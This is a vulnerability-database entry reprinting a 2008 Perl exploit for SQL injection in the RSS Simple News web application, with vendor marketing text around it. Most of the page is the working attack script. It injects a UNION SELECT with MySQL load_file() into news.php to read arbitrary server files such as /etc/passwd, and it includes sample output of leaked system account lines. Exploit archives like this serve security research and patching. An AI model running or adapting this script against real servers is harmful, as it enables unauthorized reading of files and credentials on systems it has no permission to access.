Lucene search

K

RSS Simple News SQL Injection

🗓️ 30 Dec 2008 00:00:00Reported by PikerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

RSS Simple News SQL Injection Exploit for Arbitrary File Rea

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
################################  
## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]  
## D.O.M Team  
## piker,ka0x,an0de,xarnuz  
## 2008 Security Researchers  
################################  
##  
## RSS Simple News Remote SQL Injection Exploit  
## http://sourceforge.net/projects/rss-simple-news/  
##  
## This exploit tries to read an  
## arbitrary file.  
##  
## It needs magic_quotes_gpc=off  
##  
################################  
  
# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd  
#[+] File HEX: 0x2f6574632f706173737764  
#[+] Host: http://localhost/rss/  
#[+] File content:  
#daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
#bin:x:2:2:bin:/bin:/bin/sh  
#sys:x:3:3:sys:/dev:/bin/sh  
#sync:x:4:65534:sync:/bin:/bin/sync  
#games:x:5:60:games:/usr/games:/bin/sh  
# [...]  
#[+] EOF  
#  
#  
  
  
use LWP::UserAgent;  
  
open(FILE, ">&STDOUT");  
  
my $host = $ARGV[0];  
my $file = $ARGV[1];  
  
die &_USO unless $ARGV[1];  
  
sub _USO  
{  
die "  
RSS Simple News Remote Sql Injection Exploit  
  
This exploit tries to read an  
arbitrary file.  
  
It needs magic_quotes_gpc=off  
  
usage: ./$0 <host> <file_you_want>  
ex: ./$0 http://localhost/rss/ /etc/passwd  
  
";  
}  
  
my $ua = LWP::UserAgent->new() or die;  
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");  
  
my $tmp="0x";  
my $tmp2;  
  
foreach my $c (split(//, $file)){  
$tmp2 = sprintf ("%x", ord($c));  
$tmp .= $tmp2;  
}  
  
print FILE "[+] File HEX: ".$tmp."\n";  
  
if ($host !~ /\/$/){ $host .= "/"; }  
  
print FILE "[+] Host: ".$host."\n";  
  
my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a");  
my $res = $ua->request($req);  
my $con = $res->content;  
  
my $ok = 0;  
open (OUT, ">result.txt");  
  
if ($res->is_success){  
foreach my $linea (split(/\n/, $con)){  
if($ok == 1){  
if ($linea !~ /<FILE>/){  
print FILE $linea."\n";  
print OUT $linea."\n";  
}else{  
print FILE "\n[+] EOF\n";  
print "\n[+] File saved into 'result.txt'\n";  
goto salida;  
}  
}  
if($linea =~ /<FILE>/i && $ok == 0){  
$ok = 1;  
print FILE "[+] File content: \n";  
}  
}  
salida:  
if ($ok == 0){  
print FILE "[-] Exploit Failed!\n";  
}   
}  
else{  
print FILE "[-] Exploit Failed!\n";  
}  
  
close(FILE);  
close(OUT);  
  
#EOF  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Dec 2008 00:00Current
0.4Low risk
Vulners AI Score0.4
24
.json
Report